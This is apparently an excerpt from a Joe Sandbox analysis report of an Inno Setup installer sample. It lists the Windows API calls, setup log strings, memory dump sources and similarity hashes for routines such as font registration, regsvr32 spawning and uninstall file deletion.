• DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
• DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
• EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
• EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Menu$Delete$EnableItem$System
• String ID:
• API String ID: 3985193851-0
• Opcode ID: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
• Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
• Opcode Fuzzy Hash: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
• Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID: $pI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]$oI
• API String ID: 390214022-3415521383
• Opcode ID: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
• Instruction ID: ce58c644a57a5931bfb3eb4b41fd184989c95ed3aef939848703120becc63cdc
• Opcode Fuzzy Hash: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
• Instruction Fuzzy Hash: 22910734E0010DABDB11EFA5C852BDEB7B5EF49346F508467E800B7392D778AE498B58
APIs
• FreeLibrary.KERNEL32(10000000), ref: 0047FFC4
• FreeLibrary.KERNEL32(030E0000), ref: 0047FFD8
• SendNotifyMessageA.USER32(00010432,00000496,00002710,00000000), ref: 0048004A
Strings
• Not restarting Windows because Setup is being run from the debugger., xrefs: 0047FFF9
• Deinitializing Setup., xrefs: 0047FE3A
• Restarting Windows., xrefs: 00480025
• GetCustomSetupExitCode, xrefs: 0047FE79
• DeinitializeSetup, xrefs: 0047FED5
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: FreeLibrary$MessageNotifySend
• String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
• API String ID: 3817813901-1884538726
• Opcode ID: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
• Instruction ID: a364eb3419ca1f30a9e3eb44d73b76d56ae546640220791ead322ba595580ec3
• Opcode Fuzzy Hash: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
• Instruction Fuzzy Hash: C351A1316002009FD721EB69F945B5A7BE4EB1A314F51847BF805C73A2DB389848CB99
APIs
• SHGetMalloc.SHELL32(?), ref: 00460DEF
• GetActiveWindow.USER32 ref: 00460E53
• CoInitialize.OLE32(00000000), ref: 00460E67
• SHBrowseForFolder.SHELL32(?), ref: 00460E7E
• CoUninitialize.OLE32(00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460E93
• SetActiveWindow.USER32(?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EA9
• SetActiveWindow.USER32(?,?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EB2
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
• String ID: A
• API String ID: 2684663990-3554254475
• Opcode ID: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
• Instruction ID: e80b4c5213709972e599e89028d95aa00c835143d3680f9f001b64d6594dadc3
• Opcode Fuzzy Hash: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
• Instruction Fuzzy Hash: 8C3130B0D00218AFDB01EFB6D885A9EBBF8EB09304F51447AF914F7251E7789A04CB59
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5,?,?,00000000,00471F1C), ref: 004719BC
  • Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6
  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5), ref: 00471A33
• RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000), ref: 00471A39
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
• String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
• API String ID: 884541143-1710247218
• Opcode ID: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
• Instruction ID: 88fb20351202849850a9607c8ed9a5972d7e7c37514b441dc4b5c3053575b9e2
• Opcode Fuzzy Hash: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
• Instruction Fuzzy Hash: 8111E2307005147BD711EA6ECC82B9E73ACDB45714FA1813BB405B72E1DB3C9E02865C
APIs
• GetProcAddress.KERNEL32(030E0000,inflateInit_), ref: 0045C9DD
• GetProcAddress.KERNEL32(030E0000,inflate), ref: 0045C9ED
• GetProcAddress.KERNEL32(030E0000,inflateEnd), ref: 0045C9FD
• GetProcAddress.KERNEL32(030E0000,inflateReset), ref: 0045CA0D
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: AddressProc
• String ID: inflate$inflateEnd$inflateInit_$inflateReset
• API String ID: 190572456-3516654456
• Opcode ID: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
• Instruction ID: ca09fd674ca76a7276795bdcbb2c408d45c762c24a12309d3e7b68c52f970bbc
• Opcode Fuzzy Hash: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
• Instruction Fuzzy Hash: A7011AB0901304DEEB14DF36BEC97273AA5E760B56F14D03B9C55992A2D7780848CB9C
                                                                              APIs
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                              • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                              • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                              • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                              • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Color$StretchText
                                                                              • String ID:
                                                                              • API String ID: 2984075790-0
                                                                              • Opcode ID: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                              • Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
                                                                              • Opcode Fuzzy Hash: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                              • Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68
                                                                              APIs
                                                                                • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457470,?, /s ",?,regsvr32.exe",?,00457470), ref: 004573E2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDirectoryHandleSystem
                                                                              • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                              • API String ID: 2051275411-1862435767
                                                                              • Opcode ID: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                              • Instruction ID: cb1a7ae3e697987e935249ccafc7b98f7c309c2d79f12e82178ec20c33fcefbe
                                                                              • Opcode Fuzzy Hash: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                              • Instruction Fuzzy Hash: 73410670A043086BDB10EFD5D841B9DBBF9AF45305F50407BA918BB292D7789A09CB59
                                                                              APIs
                                                                              • OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
                                                                              • GetSysColor.USER32(00000014), ref: 0044CA04
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
                                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
                                                                              • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
                                                                              • GetSysColor.USER32(00000010), ref: 0044CA56
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
                                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
                                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Text$Color$Draw$OffsetRect
                                                                              • String ID:
                                                                              • API String ID: 1005981011-0
                                                                              • Opcode ID: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                              • Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
                                                                              • Opcode Fuzzy Hash: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                              • Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669
                                                                              APIs
                                                                                • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 004949E1
                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004949F5
                                                                              • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494A0F
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A1B
                                                                              • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A21
                                                                              • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A34
                                                                              Strings
                                                                              • Deleting Uninstall data files., xrefs: 00494957
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                              • String ID: Deleting Uninstall data files.
                                                                              • API String ID: 1570157960-2568741658
                                                                              • Opcode ID: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                              • Instruction ID: d482532eb754b17a04c62f956e406d56ab6d113e5f4ee6e28585aa8da354e785
                                                                              • Opcode Fuzzy Hash: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                              • Instruction Fuzzy Hash: 0E219170344204AEEB10EBBAFD42F1737A8D799718F10003BB5049A2E3D67C9C059B6D
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD,?,?,?,?,00000000), ref: 0046F247
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD), ref: 0046F25E
                                                                              • AddFontResourceA.GDI32(00000000), ref: 0046F27B
                                                                              • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F28F
                                                                              Strings
                                                                              • AddFontResource, xrefs: 0046F299
                                                                              • Failed to open Fonts registry key., xrefs: 0046F265
                                                                              • Failed to set value in Fonts registry key., xrefs: 0046F250
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                              • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                              • API String ID: 955540645-649663873
                                                                              • Opcode ID: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                              • Instruction ID: 6d7729dfe4f1a7c8b63a61044efa00ce4130ce7f95034744da23bbcbb22f00e6
                                                                              • Opcode Fuzzy Hash: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                              • Instruction Fuzzy Hash: CC21B278B402007BDB10EBA6AC52F5E779CDB45704F604077B940EB3C2EA7D9D098A6E
                                                                              APIs
                                                                                • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                              • GetVersion.KERNEL32 ref: 00462588
                                                                              • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004625C6
                                                                              • SHGetFileInfo.SHELL32(00462664,00000000,?,00000160,00004011), ref: 004625E3
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00462601
                                                                              • SetCursor.USER32(00000000,00000000,00007F02,00462664,00000000,?,00000160,00004011), ref: 00462607
                                                                              • SetCursor.USER32(?,00462647,00007F02,00462664,00000000,?,00000160,00004011), ref: 0046263A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                              • String ID: Explorer
                                                                              • API String ID: 2594429197-512347832
                                                                              • Opcode ID: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                              • Instruction ID: 5d8862978945b954f1aea40d900f189da683ff410d790468fedd90432f5e16a2
                                                                              • Opcode Fuzzy Hash: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                              • Instruction Fuzzy Hash: DE21E7707407047AE725BB798D47F9A76D89B08708F50407FB605EA1C3E9BD8C1486AE
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                              • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8), ref: 00476E74
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,02112BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                              • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                              • API String ID: 2704155762-2318956294
                                                                              • Opcode ID: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                              • Instruction ID: d2756be845a9a7cec8c09e5f4573334ab46b2fb936870a4cb364c11667d86bc7
                                                                              • Opcode Fuzzy Hash: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                              • Instruction Fuzzy Hash: E301D654340F0436EA30317A8C86FBB644E8B40769F158137BA1CEA2D2DAAC8D15127E
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
                                                                              • LocalFree.KERNEL32(007224A0,00000000,00401B68), ref: 00401ACF
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,007224A0,00000000,00401B68), ref: 00401AEE
                                                                              • LocalFree.KERNEL32(007234A0,?,00000000,00008000,007224A0,00000000,00401B68), ref: 00401B2D
                                                                              • RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
                                                                              • RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                              • String ID: t:r
                                                                              • API String ID: 3782394904-924571639
                                                                              • Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                              • Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
                                                                              • Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                              • Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,004596AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 004595F2
                                                                                • Part of subcall function 00453910: FindClose.KERNEL32(000000FF,00453A06), ref: 004539F5
                                                                              Strings
                                                                              • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459667
                                                                              • Failed to delete directory (%d)., xrefs: 00459688
                                                                              • Stripped read-only attribute., xrefs: 004595B4
                                                                              • Failed to strip read-only attribute., xrefs: 004595C0
                                                                              • Failed to delete directory (%d). Will retry later., xrefs: 0045960B
                                                                              • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004595CC
                                                                              • Deleting directory: %s, xrefs: 0045957B
                                                                              Similarity
                                                                              • API ID: CloseErrorFindLast
